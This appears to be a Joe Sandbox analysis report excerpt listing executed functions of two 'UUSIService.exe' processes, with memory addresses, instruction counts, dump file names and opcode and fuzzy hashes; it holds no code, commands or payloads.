Opcode ID: 362152fa4e79e1f1b269eaf9c7b2c80bae5883354081cfa6f8066e5ffde70059
Instruction ID: 4687317fbd7e4eddd7907382c0bec1a01af3b9eaf0193cf3a3cc704110f7796f
Opcode Fuzzy Hash: 362152fa4e79e1f1b269eaf9c7b2c80bae5883354081cfa6f8066e5ffde70059
Instruction Fuzzy Hash: C3D0A77114D2810EFB1B93B09E604A57FA48D0604831408FBC484CA1B3D134E45ACB42

Analysis Process: UUSIService.exePID: 4208, Parent PID: 4004COMMON

Executed Functions

Function 00BE0DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1b8d998fd570e00186fb425d560b49bd7c4b4bb93379c37d994f37e891f4a5
Instruction ID: ef4578c77da9067cb113bf0d22f414dcd8daafc34c22193b34f57ce0aad0f0e0
Opcode Fuzzy Hash: 2f1b8d998fd570e00186fb425d560b49bd7c4b4bb93379c37d994f37e891f4a5
Instruction Fuzzy Hash: C8F1D135A002488FDB05DFA9C484ADCBBF2EF49320F199595E845BB362DB35AD85CF60

Function 00BE1509 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2aa1328694f8629089799f185ab6a671daab82af3f98e9dc677cfd087364cea
Instruction ID: 232a53373c37123e2d1e05c2f8dceacf9b2b3aa78b5fbb37a711581f362ab5d6
Opcode Fuzzy Hash: c2aa1328694f8629089799f185ab6a671daab82af3f98e9dc677cfd087364cea
Instruction Fuzzy Hash: 73F0E9323042409FC702A779D8146AA7BA3EFC175071485BEE0099F395DF75AC0787D4

Function 00BE0DDA Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fa565fe8aece5e670749e75854d10b1959be44ac70de817d89b2828b482713
Instruction ID: bf279d3686541aff3b4bd26e1dcaa04e091779180b5944f8676c217819707f54
Opcode Fuzzy Hash: 26fa565fe8aece5e670749e75854d10b1959be44ac70de817d89b2828b482713
Instruction Fuzzy Hash: A9C10375A002488FDB05DFA9C484ACCBBF2EF49320F199595E845BB362DB31AD85CF60

Function 00BE0B28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97dd165d9280b90190d3e0599ab27049291420740cc906b6daae64c07660cb1d
Instruction ID: 5befe98abe049e85fa1345682f57d83e23e9040dd45a15b7af87f9d8e8b19003
Opcode Fuzzy Hash: 97dd165d9280b90190d3e0599ab27049291420740cc906b6daae64c07660cb1d
Instruction Fuzzy Hash: 0A41B270A047858FDB25DF25D840A9EBBF1FF89300F14469ED496AB3A1D730A845CF50

Function 00BE0A60 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37100d55687b3c5415070be50591b4e6f564bd3caee9aecbf2fd574b55ff3dbc
Instruction ID: bd0e1d929d58ee7a5c5ec7c3fbfd5031f95995cf539804a2ed502694d21b3722
Opcode Fuzzy Hash: 37100d55687b3c5415070be50591b4e6f564bd3caee9aecbf2fd574b55ff3dbc
Instruction Fuzzy Hash: 5A2159343104048FC748EB39D898E2D3BE6FFCDA10B6640A9E40ACB3B2DE61DC029B51

Function 00BE0A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58f430ce97004896b56001033ddc2bebb4093445d1fdcb4a066ebe48b38bfbf
Instruction ID: 7e0d3d08233406bcd0acddb3427504ed64875013618238ad2f1c9732c1341323
Opcode Fuzzy Hash: e58f430ce97004896b56001033ddc2bebb4093445d1fdcb4a066ebe48b38bfbf
Instruction Fuzzy Hash: A51119343104148FC748EB39D499A1D7BE6FFCDA11B6540A9E50ACB376DE71EC029B91

Function 00BE0E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8440abe76a90d12c2717efae6015d142bacedb125545e4bff86e1ed4390d892
Instruction ID: 982babef23676e45c532c027d8162df90c88fce28a292b59bcf25142a1e89bf1
Opcode Fuzzy Hash: a8440abe76a90d12c2717efae6015d142bacedb125545e4bff86e1ed4390d892
Instruction Fuzzy Hash: D2216D35A002488FDB05DFA9D9849DCBBF2FF89320F189095E905BB261DB75AD85CF60

Function 00BE0CC0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3a4eecf31dc21fd91533144acf5d8cd2bfa2a4c9e3418536c20622c4ae2917
Instruction ID: ce75e0f1aed071143185bd6b484dc839682b3b8dc74c996761bcbd1894f2ae48
Opcode Fuzzy Hash: eb3a4eecf31dc21fd91533144acf5d8cd2bfa2a4c9e3418536c20622c4ae2917
Instruction Fuzzy Hash: 5A118B72D0170AABCB00CFB9E8404DDFBB1AF99310F25466AE111B7250E770298ACB60

Function 00BE0989 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3a7e403bffca0a2eeff784e317eb48bbb305425678291afe32e49aa4edef01
Instruction ID: f15373167a6ee8de4b98e18b9e9d0f3f0bef2cf3600c93da75afdcd03722fd9c
Opcode Fuzzy Hash: 9e3a7e403bffca0a2eeff784e317eb48bbb305425678291afe32e49aa4edef01
Instruction Fuzzy Hash: 49111638500206CFCB0AFF64E994D5DBBB2FB84301B1146AAD4119B379EB30994BDF80

Function 00BE0879 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de9c2bb9689544afd723203c7af2e468ce01caadb69d460dc3e472cdad7b8ff
Instruction ID: 2fb4a9405d60fbc3a32c36bbee7051b1fce7e5c7697ac7be2d2db7e5ca9d1899
Opcode Fuzzy Hash: 5de9c2bb9689544afd723203c7af2e468ce01caadb69d460dc3e472cdad7b8ff
Instruction Fuzzy Hash: E901B132D1464A9BCB018BB9CC100DDFBB2EFCA300F268697D111B75A0EB70254EC7A0

Function 0098D1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2933420328.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_98d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8dbae077f082e6a284129a49a071ca2f0be9ebcd538d4847d1ea34c5adbda8
Instruction ID: 7a5a2db0441838647a37d2d3c554296fad484e6e37d01c89a5f4b473f97cd1db
Opcode Fuzzy Hash: 3d8dbae077f082e6a284129a49a071ca2f0be9ebcd538d4847d1ea34c5adbda8
Instruction Fuzzy Hash: B801A73150A3449AEB246A59D984B67FB9CEF41324F18C45AED194A3C2C279D841C7B1

Function 00BE0CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2e8800834cd0b35c1f13278ae8be966f96cd981c3ceb886d16d28b8d7d91ed
Instruction ID: 01b1fac9a77717657a171fecb0316dce3f3f360813ecd5a1fbc3ee432d1cfb3b
Opcode Fuzzy Hash: 7b2e8800834cd0b35c1f13278ae8be966f96cd981c3ceb886d16d28b8d7d91ed
Instruction Fuzzy Hash: CC011E32D1060EABCB00DFBAD8404DDFBB5EF99320F258766E51577650EB74258ACB60

Function 00BE0998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6082adcd5615d43f48e345d00f00dbb6e32148750b9a87de965afd86f3027723
Instruction ID: 62ce98f27cab73958cd2c94a77660e8f3ab4762748b7a6cfbcdb59652f917d55
Opcode Fuzzy Hash: 6082adcd5615d43f48e345d00f00dbb6e32148750b9a87de965afd86f3027723
Instruction Fuzzy Hash: 3D11A838500206DFDB09FF64E998D5DBBB2FB44305B1046AAD5159B379EB30A94BDF80

Function 00BE0901 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44dadd131bbbd0325410a3931599f963204047301191b06d96a2151d834239f8
Instruction ID: b53b6c75d3467b3bf0b0409b608ddadd9d322b381327d632b3d3f8dc23bccd9e
Opcode Fuzzy Hash: 44dadd131bbbd0325410a3931599f963204047301191b06d96a2151d834239f8
Instruction Fuzzy Hash: 4CF0C272A141899BDB15DB64C865AEFBFB25F94300F15496ED002BB282DEB05906CB82

Function 0098D1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2933420328.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_98d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d23675549ab10c904c2fa6d11c5abe992e63043bce7348395f910fdf86c35de
Instruction ID: 6d3673a5c16d70ea7f0215d9d12f981fb5e4571876ea4d438783725fa0ca8bdd
Opcode Fuzzy Hash: 9d23675549ab10c904c2fa6d11c5abe992e63043bce7348395f910fdf86c35de
Instruction Fuzzy Hash: 8FF06271405344AEE7109E1AD884B66FF9CEF91734F18C45AED184B296C3799844CBB1

Function 00BE0D51 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9983086cb997ce34792db02f59042ee2c8bb844948801fbb8ba44e66b49329
Instruction ID: 0e6240f91dbfd617227a7edc7c11e1bb2c8f59f64c00068470fe275f7e3b8230
Opcode Fuzzy Hash: eb9983086cb997ce34792db02f59042ee2c8bb844948801fbb8ba44e66b49329
Instruction Fuzzy Hash: D3F0C272A112858BDB15AB74C8A4AEEBFB25F84300F15856AD502B7290DEB02906CBC2

Function 00BE0910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e917a7863ccb95f99f68bf4d31e8d14244aafc16de50f57d6696b3a1b449fd
Instruction ID: a0f1780136574db74307ab3de8cfabb38715e101e1c76f172d6caa1190611713
Opcode Fuzzy Hash: 47e917a7863ccb95f99f68bf4d31e8d14244aafc16de50f57d6696b3a1b449fd
Instruction Fuzzy Hash: 10F0E232A1014A97DF04EB64C965AEFBBF69F84300F048926D502BB380DFB0690687D1

Function 00BE1798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077490e0ad5b6e81a5daa4877065f45466528d0545aeadda91df3527c5b0f68
Instruction ID: 5480c7b120a1d874e1b8e44ce68eb866858137c62e6eeb54e1d9ab9ff3bdcf2b
Opcode Fuzzy Hash: b077490e0ad5b6e81a5daa4877065f45466528d0545aeadda91df3527c5b0f68
Instruction Fuzzy Hash: 05D02B3130035447CF3872B9680156A33D9CFC475571044BEE10DC7340DA72CC4083C0

Function 00BE0838 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a24004da9d44aa40001219e594360f30c7bdbc8c482446281c6854da38c245a
Instruction ID: 84fa373af6884906e01b0855cfab9eb0b2775aa9b025a2f0f3e3ef8b8fbe4384
Opcode Fuzzy Hash: 3a24004da9d44aa40001219e594360f30c7bdbc8c482446281c6854da38c245a
Instruction Fuzzy Hash: 48E09AB29052489FDB01CBB8C40079C7BA0EB40280F2602CED089C7282CA3189528B41

Function 00BE0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff208dea1cb3f7d1a4628717a5eac45c7f8c7a130c9c1e99fe2078f81146e13
Instruction ID: 4fd8c295688563c1536a0670c110d21dffd3fb2ec04bd4b3bb244f5e38ce36ba
Opcode Fuzzy Hash: 9ff208dea1cb3f7d1a4628717a5eac45c7f8c7a130c9c1e99fe2078f81146e13
Instruction Fuzzy Hash: 5DD01772905248EFDB01DFA4C90575D7BF8FB05280F6505D6E448C7201DB319E51C791

Function 00BE1791 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2938121888.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_be0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a98fb4522198e1d5bac0672620140e8032ae3812272f5fc5c875f6b7b587005
Instruction ID: c349ff33b6d31c6a4d67005fa434d4aaaee60ed7bb9bcfe16660beef78285d45
Opcode Fuzzy Hash: 6a98fb4522198e1d5bac0672620140e8032ae3812272f5fc5c875f6b7b587005
Instruction Fuzzy Hash: 9CD02272A0D2900ECB35217928104FD2BE4895134831405FFD405D1662D2E28C028340

Analysis Process: UUSIService.exePID: 6416, Parent PID: 4004COMMON

Executed Functions

Function 01320DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6afbb0eeb9bf26201f1d607e65a88186b14d094a77f6260c578156419dedeccb
Instruction ID: 7b2a09cf4af2c97f62a0e17f7534c89ff231f2fbc2c01c60a4c44b8fb46a8bfe
Opcode Fuzzy Hash: 6afbb0eeb9bf26201f1d607e65a88186b14d094a77f6260c578156419dedeccb
Instruction Fuzzy Hash: 1EF1E075A002498FDB05DFA8C484ADCBBF2EF49324F199195E845EB362DB31AD85CF60

Function 01321509 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f16c67bec4838d546797b6a0bc99a4eb83e38b0b796593ab2e1fb5c233d900
Instruction ID: c0397b4ac3678a6f1d3831e15901e587ed62336107034af7427a10b8e9896b1d
Opcode Fuzzy Hash: a6f16c67bec4838d546797b6a0bc99a4eb83e38b0b796593ab2e1fb5c233d900
Instruction Fuzzy Hash: A0F02B3120C3806FC70367799C258AE7FA3DEC224030445AFE059CB796DF64AC0ACB91

Function 01320DD8 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e4134d19b3590721792f2b73d17a3e29aabe6fee4aa791f5767446d2cf6b7c
Instruction ID: f348978e56b81097caa1e2016b921e990a3c5bc90587659168566bec49fb8c86
Opcode Fuzzy Hash: 59e4134d19b3590721792f2b73d17a3e29aabe6fee4aa791f5767446d2cf6b7c
Instruction Fuzzy Hash: 63C1F175A002488FDB05DFA8C484ACCBBF2EF49324F199195E845EB362DB31AD85CF60

Function 01320B28 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28eb1229cddce63aff738cdeb179c91fc7776aaab4a27643e7843e2e997421eb
Instruction ID: f0f2a6373427cb24278c3be05aca1edc8ab6e2bd38fb5880f06f543724cefc4c
Opcode Fuzzy Hash: 28eb1229cddce63aff738cdeb179c91fc7776aaab4a27643e7843e2e997421eb
Instruction Fuzzy Hash: 9141C9B1A05765CFDF25DF28D84069EBBF1FF88300B14465AE496EB6A1D730A848CF50

Function 01320A60 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5187fc7387d225d94c07aa4a097eeec8436d4c3370c9f2db1bc2aca573afca
Instruction ID: d3fe99fa1783f540655a424bbb51298f8cba012e9e06bb6b02451b4a3d54b86e
Opcode Fuzzy Hash: bd5187fc7387d225d94c07aa4a097eeec8436d4c3370c9f2db1bc2aca573afca
Instruction Fuzzy Hash: EB2167343004408FC749EB39D898A2D3BE2FF8961076640AAE106CF3B2CE71EC029B91

Function 01320A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e6273fb09e8008b883c3a89cb56beffd25ee7d555852957c47652758a2485b
Instruction ID: a0af0cc5c114a5482b4e9302608e3e2d52f38b4136c0c2382777c75d63562e38
Opcode Fuzzy Hash: 04e6273fb09e8008b883c3a89cb56beffd25ee7d555852957c47652758a2485b
Instruction Fuzzy Hash: 411146343004108FC748EB39D898A2E7BE6FFCDA14B6540A9E50ACB372CE71EC019B91

Function 01320E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afb0a9a8835db4ce1ac7f2becf77150bad7a2febaa34b0cc2ae03969220e6d9
Instruction ID: 6aa9a18e0d3e59968c43755f550d154ce5db286b90ca952d87b85afd240f4909
Opcode Fuzzy Hash: 1afb0a9a8835db4ce1ac7f2becf77150bad7a2febaa34b0cc2ae03969220e6d9
Instruction Fuzzy Hash: 47219D35A012588FDB05DFA8D4849DCBBF2FF89224F189095E905AB261DB31AD84CF60

Function 01320CC0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb632738d4e989666cbed62c482a6c559cfc93651a65578b8f1973b35579bbec
Instruction ID: cf10ba964c8a8de3c3983526e063f0adfd9fcc1b08e07b76cc564d78ec0f797a
Opcode Fuzzy Hash: cb632738d4e989666cbed62c482a6c559cfc93651a65578b8f1973b35579bbec
Instruction Fuzzy Hash: A4118E32D0574D9BCB01CFB9D8404DDFBB1EF99310F258666E111B7650E770258ACB60

Function 01320989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce44af6d40ab2506870541f7e54ac66c8825fd20769de1e1c360e98c003d6f5
Instruction ID: 25d36b88fb3f9e2601a3be28612d529774bd8789c1a128c6e87b1328bf07b27b
Opcode Fuzzy Hash: 3ce44af6d40ab2506870541f7e54ac66c8825fd20769de1e1c360e98c003d6f5
Instruction Fuzzy Hash: E711DA78511146EFDB06FF74E898B6CBFB2FB84300B1046A9D905D7269EA309D4ACF40

Function 01320879 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f8b4ded2ea20cf7eedeecf369e24654aaefe76bdd8ebe5f837eab26f8cab23
Instruction ID: 1213fa6dde794d2bdea27d85bff5a359a6bfdd38ec819b7f8127549bc6b6f346
Opcode Fuzzy Hash: 14f8b4ded2ea20cf7eedeecf369e24654aaefe76bdd8ebe5f837eab26f8cab23
Instruction Fuzzy Hash: F4019232D1464A9BCB018BB9D8144DDFBB2EFCA300F158797D111B75A0E774254ECBA1

Function 01320CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63707f145732275ca0900adad4f46e55d6df0764c89bd02f4bf0965edf48e2c0
Instruction ID: 93527997fa7a836e42f5d5b578c9963a97237766d715988b6807231750b3f000
Opcode Fuzzy Hash: 63707f145732275ca0900adad4f46e55d6df0764c89bd02f4bf0965edf48e2c0
Instruction Fuzzy Hash: 7D011232D1060EABCB00DFB9D8404DDFBB5EF99310F254766E11577650E774254ACB50

Function 00FBD1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3153922592.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_fbd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0049f526ca4771d7fb3268e9f467a7221e9abd7f336b7f149c9051f8868a805
Instruction ID: 32f096f7540b3c17f8e219ed82f0a0ddd3f5ea3999f7ca92f9cbc91aed5eb25c
Opcode Fuzzy Hash: d0049f526ca4771d7fb3268e9f467a7221e9abd7f336b7f149c9051f8868a805
Instruction Fuzzy Hash: F301F7314043849AF7205A1AD980BA7FF9CEF41330F18C45AED084A182D238D841DE73

Function 01320998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892015f42f03b7fade5629d0b926ffbb27f6685dbe508a09ead17f6976007758
Instruction ID: 12cd544d8e69f4ea1dcef89d8c7773619925b06280613603abbee439c2f97a17
Opcode Fuzzy Hash: 892015f42f03b7fade5629d0b926ffbb27f6685dbe508a09ead17f6976007758
Instruction Fuzzy Hash: 4311967850114AEFDB05FF64F898A6DBBB2FB84301B104669D905D7269EB30AD4ACF80

Function 01320D51 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364467112b765eae920871b9b07dd195e4bed42c1aa01a4f9856439da250a683
Instruction ID: 44aac2ca63df941508885a6454e503498ab754db1519695102b75483121635c4
Opcode Fuzzy Hash: 364467112b765eae920871b9b07dd195e4bed42c1aa01a4f9856439da250a683
Instruction Fuzzy Hash: D4F0C872E16199CBCB059B74C8A59EE7FB2DF84300F05456AD542A7681DEB0550AC782

Function 01320901 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3a14e4c5dd52fdfb41aa72d2f765f80e27785073ec6a6bbb229e335a9918f75
Instruction ID: bed02307ae630ba4294df7f46d4064a67558271e3c6b5441b85c3e8ec06bff70
Opcode Fuzzy Hash: d3a14e4c5dd52fdfb41aa72d2f765f80e27785073ec6a6bbb229e335a9918f75
Instruction Fuzzy Hash: 22F04C72A151498BCB05DB30C8659EFBFB28F84300F04893EE003B7290DE705506CBC2

Function 00FBD1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3153922592.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_fbd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ad76c7da33f7c38721fa4d1de61c20fa37a45d736e4eee91f2ca674b3e9af0
Instruction ID: c9cfd916b249988464e6cf12a6f29875522eb23b81c6137bdf84547a54e46403
